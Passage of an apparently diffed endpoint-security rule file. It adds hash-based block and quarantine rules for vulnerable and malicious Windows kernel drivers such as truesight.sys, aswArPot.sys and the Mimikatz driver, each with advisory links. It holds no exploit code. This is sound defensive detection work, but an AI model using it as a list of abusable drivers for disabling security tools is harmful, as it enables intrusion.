+ "hl_testing_start_time": "2026-03-23T11:45:30.823951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c23d427b9e2f82b2e76990423d71302347eec638291d316162848ce5c8c9e127",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "431e8288-f2d1-5673-8d3b-0f60db8ec7f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968613Z",
+ "creation_date": "2026-03-23T11:45:29.968615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4da08c0681fbe028b60a1eaf5cb8890bd3eba4d0e6a8b976495ddcd315e147ba",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "43339524-6517-5cdc-a2ce-4cd107c93ec0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461697Z",
+ "creation_date": "2026-03-23T11:45:30.461700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7afdb552a7fa25dd716fe3a55c988a59d120e78f9ee95067f31901f51987ab8d",
+ "comment": "Vulnerable Kernel Driver (aka titidrv.sys) [https://www.loldrivers.io/drivers/705facba-b595-41dd-86a6-93aefe6a6234/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4338542b-c92f-57fb-ac09-e7dde9fcf460",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819071Z",
+ "creation_date": "2026-03-23T11:45:30.819073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93cdc6e885459d95d5e9d6b2ee979e5cad44af1f57bca3947d594847cfbd5829",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4368beaf-8942-5979-8455-56b6fa943495",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977934Z",
+ "creation_date": "2026-03-23T11:45:29.977936Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977949Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59",
+ "comment": "Vulnerable Kernel Driver (aka LgDCatcher.sys) [https://www.loldrivers.io/drivers/a8e999ee-746f-4788-9102-c1d3d2914f56/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "438f0b07-003e-5208-9167-636191eb5477",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140132Z",
+ "creation_date": "2026-03-23T11:45:31.140135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46bbd4f34a828cd453ccafedb8b8324c8932ad364cbeb976cd246ad87a235335",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "439744de-d70a-5c52-9d5a-80dc09625405",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473357Z",
+ "creation_date": "2026-03-23T11:45:31.473361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08eb3cc0078e0cb5efa0db9840c9b50740fbc6e00c7463bd876bb2623d6f6cf5",
+ "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "439d9a33-4f95-5e9b-b3b2-348f4d457193", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157314Z", + "creation_date": "2026-03-23T11:45:31.157317Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157323Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16ab022a72256fdf002fe69d9a15867c6bc710f67aacf8bd15a5518daee07862", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43a57e7b-1e6a-5e78-ba70-9bfe97a1867b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613735Z", + "creation_date": "2026-03-23T11:45:29.613737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43aa8ac6-2aed-5369-a9a7-ca12b9fc6d51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818899Z", + "creation_date": "2026-03-23T11:45:31.818902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818910Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf82ad779c62df6d85fd97a21258543cf7f25947f67d9d5ce35d73a2cfef6f95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43b0ef74-1d6e-500b-942e-dde6933571d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968951Z", + "creation_date": "2026-03-23T11:45:29.968953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968959Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e0aa67cfdbe27a059cbd066443337f81c5b6d37444d14792d1c765d9d122dcf", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43be0e44-e6ad-588c-9ae9-8c2cf439f831", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970623Z", + "creation_date": 
"2026-03-23T11:45:29.970626Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970634Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff3612ac3d95adc372cc9df3bdcaec657740d413d8d836bf367285acc5434085", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43d6686c-09a3-5dc4-921e-14fa7e5b3f12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488223Z", + "creation_date": "2026-03-23T11:45:31.488225Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a7e1bdc61c90808173e4745808fec9c9d21d77111bae07ae387b12782344902", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43dc0db8-d179-5b59-95d2-c308a08103d9", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605891Z", + "creation_date": "2026-03-23T11:45:29.605893Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "accc8e337514f7a29c776518f83b925d3096d51e0aedd06ab75250c463f2a132", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43e092c4-c9f3-59a3-8fde-808f9b9c3307", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826621Z", + "creation_date": "2026-03-23T11:45:30.826623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826628Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4f981d1b09125f168c6868962dcd9e9991c494a8610874748250cfcc4af7797b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "43e96b9a-3413-5bc8-aa1a-30a5818810f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607130Z", + "creation_date": "2026-03-23T11:45:29.607132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3", + "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "441530f7-6df6-5dfc-95a8-6016184450b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156196Z", + "creation_date": "2026-03-23T11:45:31.156198Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fba0815c4be3fb2b11c066560c5d0265ff94d01795a88ca74e8c7f360bdbcf7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4419950d-04ad-5ea6-8f4d-e2ddb8dc2d44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475475Z", + "creation_date": "2026-03-23T11:45:30.475478Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475487Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4225bd4ba3f5d6d5cbd0606402aedca7342e2538abf85309ed3ccef0a738cbb8", + "comment": "Malicious Kernel Driver (aka 
a26363e7b02b13f2b8d697abb90cd5c3.sys) [https://www.loldrivers.io/drivers/ef6b5fe8-6c4b-4b32-8adc-c1d8a83e8558/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4423177c-9e0b-59c9-85fe-a7e374c50dfe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830150Z", + "creation_date": "2026-03-23T11:45:31.830152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85bdd4eb7868d84c15de202018937838f5c9b6b173c30cd6228cb9272b567182", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4423bf76-16fa-548e-85fd-a01e1b4beffb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.811957Z", + "creation_date": "2026-03-23T11:45:31.811959Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecad5289a6955e2dd72964beb6fe9d56ce961f00dad451e955af0ce399ae4c63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "44366df7-cc5c-556a-8ebc-32014bce353b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490023Z", + "creation_date": "2026-03-23T11:45:31.490026Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a12502e4943714591eafa4a56da73d3df723ba2f873826d6b4bd48a1929a69ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "444857d4-8300-5edd-9957-19dcd39282de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976446Z", + "creation_date": "2026-03-23T11:45:29.976448Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976453Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) 
[https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "444d6267-1103-5085-bbce-8c5c7ac39698", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832712Z", + "creation_date": "2026-03-23T11:45:30.832714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ebd3a622b92f28e6adb3570a0b9d11c166a3df492118aa7d27608735d304da7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4465a05b-a8e3-5236-b94b-d69ecf2393d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145585Z", + "creation_date": 
"2026-03-23T11:45:32.145587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56ece6b6b1d2da18458c9d8edc586bd2b9f7c4b092a9745fbed659238b2b3157", + "comment": "Vulnerable Kernel Driver (aka pxitrig64.sys) [https://www.loldrivers.io/drivers/c8619f49-8e23-489b-9878-53d27533da15/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4480634c-180c-5b8a-b90e-d002b4460409", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617448Z", + "creation_date": "2026-03-23T11:45:29.617451Z", + "enabled": true, + "block_on_agent": 